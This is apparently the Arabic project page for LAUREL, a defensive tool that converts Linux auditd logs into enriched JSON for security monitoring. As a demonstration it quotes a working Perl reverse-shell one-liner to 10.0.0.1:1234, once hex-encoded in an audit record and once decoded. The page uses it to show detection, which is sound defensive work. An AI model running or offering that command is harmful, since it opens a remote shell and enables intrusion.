
laurel v0.8.2
تحويل سجلات مراجعة Linux لاستخدام SIEM
Linux Audit – تسجيل سهل وقوي وقابل للاستخدام
LAUREL هو مكون إضافي لمعالجة الأحداث بعد وقوعها لـ auditd(8) يقوم بتوليد سجلات تدقيق غنية ومفيدة بتنسيق JSON مناسبة لإعدادات مراقبة الأمان الحديثة.
يمكن العثور على الوثائق المقابلة لأحدث إصدار مستقر هنا.
لماذا؟
باختصار: بدلاً من أحداث التدقيق التي تبدو هكذا…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
……يقوم LAUREL بتحويلها إلى سجلات JSON حيث تصبح الفوضى التي يحاول المهاجمون/مختبرو الاختراق/فريق الأحمر إحداثها واضحة للوهلة الأولى:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
يحدث هذا في المصدر لأن LAUREL يعمل على المضيف حيث يتم توليد أحداث التدقيق. يتم إثراء الأحداث بمعلومات مفيدة حول العملية الأم (ppid):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
التوثيق
تم وصف تفاصيل التكوين والتشغيل في صفحة الدليل laurel(8). يمكن العثور على تفاصيل حول تنسيق السجل والمبررات في صفحة الدليل laurel-about(7). تحتوي صفحة laurel-audit-rules(7) على نصائح وأمثلة لتكوين قواعد التدقيق المفيدة لكشف تكتيكات المهاجمين.
تحتوي تعليمات تثبيت LAUREL على إرشادات حول كيفية بناء LAUREL من المصدر وكيفية تثبيته وتكوينه.
طورنا LAUREL لأننا لم نكن راضين عن مجموعات الميزات وخصائص الأداء للمشاريع والمنتجات الحالية. يُرجى الرجوع إلى مستند الأداء للحصول على التفاصيل.
انظر أيضًا
- ansible-auditd-laurel، دور Ansible لنشر auditd + laurel، بواسطة @0xFustang / CERT-EU
الترخيص
رخصة جنو العمومية العامة، الإصدار 3
المؤلفون
- Hilko Bengen <[email protected]>
- Sergej Schmidt <[email protected]>
تم إنشاء الشعار بواسطة Birgit Meyer <[email protected]>.